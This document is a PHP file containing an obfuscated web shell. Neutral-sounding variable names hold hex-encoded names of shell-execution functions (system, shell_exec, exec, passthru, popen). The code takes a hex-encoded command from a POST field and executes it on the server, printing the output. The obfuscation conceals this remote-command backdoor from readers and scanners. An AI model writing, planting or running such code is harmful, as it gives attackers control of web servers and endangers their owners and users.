<?php


$property_set1 = '3';
$property_set2 = '7';
$property_set3 = '6';
$property_set4 = '8';
$property_set5 = '5';
$property_set6 = 'c';
$property_set7 = 'f';
$property_set8 = '4';
$property_set9 = '0';
$property_set10 = 'e';
$property_set11 = '2';
$property_set12 = '1';
$data_storage1 = pack("H*", '7' . $property_set1 . '7' . '9' . $property_set2 . '3' . '7' . '4' . '6' . '5' . $property_set3 . 'd');
$data_storage2 = pack("H*", $property_set2 . $property_set1 . '6' . $property_set4 . $property_set3 . $property_set5 . '6' . 'c' . '6' . $property_set6 . '5' . $property_set7 . '6' . $property_set5 . $property_set2 . $property_set4 . $property_set3 . $property_set5 . '6' . $property_set1);
$data_storage3 = pack("H*", $property_set3 . '5' . $property_set2 . '8' . $property_set3 . '5' . $property_set3 . $property_set1);
$data_storage4 = pack("H*", $property_set2 . '0' . '6' . '1' . $property_set2 . $property_set1 . '7' . $property_set1 . $property_set2 . $property_set8 . '6' . '8' . $property_set2 . '2' . '7' . '5');
$data_storage5 = pack("H*", $property_set2 . '0' . '6' . 'f' . $property_set2 . $property_set9 . '6' . '5' . '6' . $property_set10);
$data_storage6 = pack("H*", $property_set2 . $property_set1 . '7' . $property_set8 . $property_set2 . $property_set11 . '6' . $property_set5 . '6' . $property_set12 . $property_set3 . 'd' . '5' . 'f' . $property_set3 . $property_set2 . $property_set3 . $property_set5 . '7' . $property_set8 . $property_set5 . 'f' . '6' . $property_set1 . $property_set3 . $property_set7 . $property_set3 . $property_set10 . '7' . '4' . $property_set3 . $property_set5 . $property_set3 . $property_set10 . '7' . $property_set8 . $property_set2 . '3');
$data_storage7 = pack("H*", '7' . '0' . '6' . $property_set1 . '6' . $property_set6 . '6' . 'f' . $property_set2 . $property_set1 . $property_set3 . $property_set5);
$splitter_tool = pack("H*", $property_set2 . '3' . $property_set2 . '0' . '6' . 'c' . '6' . '9' . $property_set2 . '4' . '7' . $property_set8 . $property_set3 . $property_set5 . '7' . $property_set11 . $property_set5 . $property_set7 . $property_set2 . $property_set8 . $property_set3 . 'f' . $property_set3 . 'f' . $property_set3 . 'c');
if (isset($_POST[$splitter_tool])) {
    $splitter_tool = pack("H*", $_POST[$splitter_tool]);
    if (function_exists($data_storage1)) {
        $data_storage1($splitter_tool);
    } elseif (function_exists($data_storage2)) {
        print $data_storage2($splitter_tool);
    } elseif (function_exists($data_storage3)) {
        $data_storage3($splitter_tool, $itm_item);
        print join("\n", $itm_item);
    } elseif (function_exists($data_storage4)) {
        $data_storage4($splitter_tool);
    } elseif (function_exists($data_storage5) && function_exists($data_storage6) && function_exists($data_storage7)) {
        $element_dchunk = $data_storage5($splitter_tool, 'r');
        if ($element_dchunk) {
            $fac_component = $data_storage6($element_dchunk);
            $data_storage7($element_dchunk);
            print $fac_component;
        }
    }
    exit;
}
